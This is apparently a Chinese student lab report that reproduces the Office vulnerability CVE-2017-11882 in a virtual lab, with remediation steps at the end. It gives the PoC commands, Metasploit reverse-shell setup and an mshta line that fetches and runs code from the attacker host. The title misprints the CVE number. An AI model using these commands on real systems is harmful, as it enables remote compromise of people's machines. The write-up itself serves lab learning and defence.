• CVE-20117-111882漏洞复现及利用


    背景

    工程实践题目:
    渗透方向:实验班要求
    1、利用已有的漏洞,搭建内网实验环境(WEB漏洞或系统漏洞以近两年内的CVE编号为准,每人一个,先报先得,具体由学习委员负责协调),利用工具进行内网渗透攻击。
    2、要求必须用到端口转发方面的知识。
    3、上交调试好的环境(VMware格式)、完整的渗透测试报告(包括环详细的境搭建文档、脚本分析文档、渗透攻击过程)、和教学实习报告。

    漏洞影响版本

    Office 365
    Microsoft Office 2000
    Microsoft Office 2003
    Microsoft Office 2007 Service Pack 3
    Microsoft Office 2010 Service Pack 2
    Microsoft Office 2013 Service Pack 1
    Microsoft Office 2016
    

    实验环境

    攻击靶机:kali 2.0 IP:192.168.79.129 Metasploit
    目标靶机:Windows7 IP: 192.168.79.128 Microsoft Office 2013
    

    需要准备的文件

    [CVE-2017-11882的POC](https://github.com/Ridter/CVE-2017-11882/)
    [PS_shell.rb]
    [Office 2013]
    

    漏洞验证

    使用POC文件执行以下命令生成测试doc文件:

    python Command43b_CVE-2017-11882.py -c “cmd.exe /c calc.exe” -o test.doc
    

    将生成的doc文件发送至目标主机直接打开,弹出计算器即漏洞验证成功,可进一步利用

    image

    漏洞利用

    配合kali2.0 meterpreter 接收目标靶机反弹的shell

    下载模块

    下载PS_shell.rb,将该文件放在kali 的/usr/share/metasploit-framework/modules/exploits/windows/shells/目录下,输入msfconsole启动metasploit,然后执行reload_all重新加载一下所有模块。

    image

    image

    image

    使用模块

    image

    命令如下:

    use exploit/windows/shells/PS_shellset payload windows/meterpreter/reverse_tcpset lhost 192.168.79.129set uripath abc
    

    开启监听

    image

    命令:

    exploit
    

    反弹shell

    使用POC生成新的测试doc文件,在目标靶机中打开生成的doc文件,目标靶机正常上线。

    python Command109b_CVE-2017-11882.py -c “mshta http://192.168.79.129:8080/abc“ -o test2.doc
    

    image

    image

    输入session可以查看到接收到的shell

    image

    选择sessions 1并获取目标靶机信息

    image

    image

    image


    漏洞修复

    1、微软已经对此漏洞做出了修复。

    (1)下载https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 更新补丁进行修补

    (2)开启Windows Update功能,定期对系统进行自动更新

    2、在注册表中禁用该漏洞模块:

    按下Win+R组合键,打开cmd.exe
    输入以下两条命令:

    reg add “HKLMSOFTWAREMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046} ” /v “Compatibility Flags” /t REG_DWORD /d 0x400reg add “HKLMSOFTWAREWow6432NodeMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046} ” /v “Compatibility Flags” /t REG_DWORD /d 0x400
    

    相关链接:
    http://zksmile.me/2017/11/28/CVE-2017-11882/
    http://www.myh0st.cn/index.php/archives/329/


    END

  • 相关阅读:
    centos7使用yum时报错”Error: rpmdb open failed“
    shell脚本监控httpd进程,如果进程异常自动重启服务
    DNS域名服务系统(二)--基本dns域名解析/主从dns解析
    DNS域名服务系统(一)
    ** server can't find mail.extmail.org: SERVFAIL
    搭建邮件服务器postfix向mysql导入extmail.sql文件时报错 ERROR 1064 (42000) at line 50: You have an error in your SQL syntax; 'TYPE=MyISAM COMMENT='Ext/Webman
    Nginx实现https和跳转功能
    Nginx的反向代理和负载均衡
    Nginx基于域名的虚拟主机
    jquery select chosen禁用某一项option
  • 原文地址:https://www.cnblogs.com/sn1per/p/12552446.html
Copyright © 2020-2023  润新知